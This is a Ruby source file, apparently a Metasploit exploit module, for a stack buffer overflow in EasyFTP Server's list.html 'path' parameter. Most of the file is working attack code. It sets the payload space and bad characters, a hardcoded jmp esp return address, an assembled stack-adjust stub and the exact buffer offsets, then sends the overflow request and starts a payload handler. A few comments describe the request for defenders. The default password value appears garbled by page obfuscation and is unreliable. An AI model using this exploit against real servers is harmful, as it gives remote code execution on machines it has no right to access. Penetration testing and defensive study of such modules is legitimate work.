Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the EasyFTP Server 'list.html' path overflow (see
# 'Description' below).  For defenders, the observable request built by
# #exploit is a single HTTP GET to /list.html on RPORT (default 8080) whose
# 'path' query parameter is 332 bytes long and sent with HTTP basic
# authentication; the payload occupies the start of that parameter.
class MetasploitModule < Msf::Exploit::Remote
  # Framework reliability rank for this module.
  Rank = GreatRanking

  # Server banner pattern used by the framework's HTTP fingerprinting; the same
  # product string is re-checked in #check.
  HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata (name, description, references, payload
  # constraints, single universal target) and the datastore options.
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EasyFTP Server list.html path Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
        and earlier. EasyFTP fails to check input size when parsing the 'path' parameter
        supplied to an HTTP GET request, which leads to a stack based buffer overflow.
        EasyFTP allows anonymous access by default; valid credentials are typically
        unnecessary to exploit this vulnerability.

        After version 1.7.0.12, this package was renamed "UplusFtp".

        Due to limited space, as well as difficulties using an egghunter, the use of
        staged, ORD, and/or shell payloads is recommended.
      },
      'Author'         =>
        [
          'ThE g0bL!N',   # Original exploit [see References]
          'jduck'         # Metasploit re-implementation
        ],
      'References'     =>
        [
          [ 'OSVDB', '66614'],
          [ 'EDB', '11500' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          # Only 256 bytes are available before the padding/return layout built
          # in #exploit; #exploit refuses to run if the encoded payload is larger.
          'Space'    => 256,
          # Bytes that must not appear in the 'path' parameter (they would be
          # consumed by HTTP/URL parsing before reaching the vulnerable code).
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",
          'Compat'   =>
            {
              'ConnectionType' => '+ws2ord',
            },
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Single "universal" target; the return address lives in shell32.dll,
          # so it is tied to the stated Windows XP SP3 build rather than to the
          # EasyFTP binary itself.
          [ 'Windows XP SP3 - Easy FTP Server Universal',
            # NOTE: It's not possible to use addresses within the
            # binary due to the nul byte.
            {
              'Ret' => 0x7cc5d507 # jmp esp in shell32.dll
              #'Ret' => 0xdeadbeef
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2010-02-18'
    ))

    # Basic-auth credentials are sent on every request; the defaults reflect
    # the anonymous access described above.
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
        # NOTE(review): the default value shown here looks like an e-mail
        # obfuscation artifact of the page this listing was taken from; confirm
        # the real default against the upstream module before relying on it.
        OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])
      ])
  end

  # Banner-based vulnerability check.
  #
  # Matches the product name in the HTTP fingerprint only; no version is parsed
  # or compared, so a patched build that still presents the "Easy-Web Server/"
  # banner would presumably also be reported as Detected.
  #
  # @return [Exploit::CheckCode] Detected when the banner matches, Safe otherwise
  def check
    info = http_fingerprint # check method
    if info and (info =~ /Easy\-Web Server\//)
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end


  # Builds the oversized 'path' parameter and sends it in one GET request,
  # then starts the payload handler.
  #
  # The parameter layout, by offset, is:
  #   0..     encoded payload (at most 'Space' bytes)
  #   ..268   random filler
  #   268     target return address (4 bytes, little-endian)
  #   ..280   random filler
  #   280     stack-adjust stub assembled below
  #   ..332   random filler
  #
  # @raise via fail_with when the encoded payload exceeds payload_space
  def exploit
    # payload_space is the framework's view of the 'Space' declared in initialize.
    if (payload.encoded.length > payload_space)
      # NOTE(review): Failure::BadConfig may describe a too-large payload better
      # than Failure::Unknown — confirm against framework conventions.
      fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")
    end

    # Fix up ESP, jmp to the beginning of the buffer
    stub_asm = %q{
      mov edi, esp
      add esp, 0xfffffc04
      add edi, 0xfffffee8
      jmp edi
    }
    # Assembled with Metasm for IA-32; encode_string yields the raw bytes.
    stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

    # Build the path up
    # Each rand_text call pads to an absolute offset (268, 280, 332), so the
    # positions of the return address and stub do not depend on payload size.
    path = ''
    path << payload.encoded
    path << rand_text(268 - path.length)
    # NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.
    path << [target.ret].pack('V')
    path << rand_text(280 - path.length)
    path << stub
    path << rand_text(332 - path.length)

    uri = "/list.html?path="
    uri << path

    print_status("Trying target #{target.name}...")
    # 5-second timeout; a reply is not expected if the overflow took effect.
    res = send_request_raw({ 'uri' => uri }, 5)

    # A response arriving at all is treated as a sign the overflow did not
    # behave as intended; the body is printed to help diagnose why.
    if (res)
      print_error("The server unexpectedly responded, this is not good.")
      print_status(res.to_s)
    end

    # Hand off to the payload handler regardless, in case the session arrives late.
    handler
  end
end